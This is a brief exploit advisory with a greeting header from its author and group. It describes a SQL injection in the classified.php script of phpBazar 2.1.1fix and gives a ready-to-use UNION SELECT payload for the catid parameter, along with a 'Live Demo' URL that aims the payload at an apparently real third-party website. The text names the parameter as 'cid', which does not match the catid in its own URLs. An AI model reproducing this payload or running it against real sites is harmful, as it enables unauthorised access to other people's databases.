/* Author : MizoZ [from MA] Group : EvilWay, evilway[at]mail[dot]com Email : mizozx[at]gmail[dot]com Greetz : Zuka, Dyle !! MABROOK L3IIIIIIIIIID */ The vulnerability is in the $_GET['cid'] , exploit : [HOST]/[PATH]/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7-- Live Demo : http://toutsurlegoldenretriever.fr/phpBazar-2.1.1fix/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--